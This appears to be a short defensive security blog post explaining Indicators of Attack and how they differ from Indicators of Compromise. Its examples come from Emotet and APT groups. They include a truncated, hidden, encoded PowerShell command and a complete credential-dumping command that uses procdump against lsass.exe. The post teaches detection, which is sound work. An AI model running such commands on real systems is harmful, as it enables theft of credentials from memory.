QeeqBox

Indicators of Attack

Written by

Giga Alqeeq

in

Indicators of Attack (IoA)

Indicators of Attack (IoAs) are behavioral signs that suggest an attack is either in progress or being attempted. Unlike Indicators of Compromise (IoCs), which provide evidence after a breach has occurred, IoAs concentrate on detecting suspicious behaviors, tactics, and techniques used by attackers in real-time.

IoAs assist security teams in identifying malicious activities at an earlier stage in the attack lifecycle. Instead of searching for known malicious artifacts, IoAs focus on monitoring how attackers operate. This makes IoAs particularly valuable against advanced persistent threats (APTs), fileless malware, insider threats, and zero-day attacks, which may not have recognizable signatures or hashes.

Rather than depending on static indicators, such as known malicious IP addresses or file hashes, IoAs evaluate abnormal or suspicious activities. These activities can include attempts at privilege escalation, unusual command executions, lateral movements between systems, credential dumping, persistence techniques, or suspicious authentication behaviors.

Key Characteristics

  • Proactive: Emphasizes the detection of suspicious behavior as it occurs, which aids in identifying attacks early in their lifecycle.
  • Behavior-Anomaly Focus: Identifies unusual patterns of activity instead of relying solely on known malicious signatures or artifacts.
  • Early Attack Detection: Allows security teams to respond while an attack is ongoing, thereby minimizing potential damage.
  • Based on Attacker Tactics, Techniques, and Procedures (TTPs): Concentrates on understanding how attackers operate rather than just the tools they employ.

Examples

  • PowerShell execution with encoded commands
    • Emotet Downloader (ff76ff1440947e3dd42578f534b91fdb8229c1f40fed36a3dd5688dbc51f0014)
    • powershell.exe -w hidden -en JABBHoAe…
  • Suspicious execution chain
    • Emotet Downloader ff76ff1440947e3dd42578f534b91fdb8229c1f40fed36a3dd5688dbc51f0014
    • winword.exe -> powershell.exe -> 937.exe
  • Privilege escalation
    • Digital Eye (APT)
    • bK2o.exe used for pass-the-hash (Similar to mimikatz)
  • Credential Dumping
    • FIN13 (APT)
    • procdump.exe -ma lsass.exe lsass.dmp

More posts